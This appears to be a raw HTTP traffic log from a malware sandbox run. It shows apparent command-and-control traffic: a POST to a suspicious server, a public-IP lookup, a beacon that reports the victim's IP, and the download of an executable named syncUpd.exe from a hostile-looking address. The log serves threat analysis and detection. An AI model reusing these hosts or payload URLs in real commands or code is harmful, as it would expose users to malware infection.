POST /theme/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.68 Content-Length: 31 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 04 Jan 2024 22:51:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive

GET /?format=ewf HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: api.ipify.org Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.25.1 Date: Thu, 04 Jan 2024 22:51:26 GMT Content-Type: text/plain Content-Length: 15 Connection: keep-alive Vary: Origin

GET /scripts/plus.php?ip=175.208.134.152&substr=seven&s=ab HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: 91.92.254.7 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Thu, 04 Jan 2024 22:51:26 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 1 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

GET /syncUpd.exe HTTP/1.1 User-Agent: NSIS_Inetc (Mozilla) Host: 185.172.128.53 Connection: Keep-Alive Cache-Control: no-cache

HTTP/1.1 200 OK Date: Thu, 04 Jan 2024 22:51:27 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Thu, 04 Jan 2024 22:45:02 GMT ETag: "39800-60e267b655897" Accept-Ranges: bytes Content-Length: 235520 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program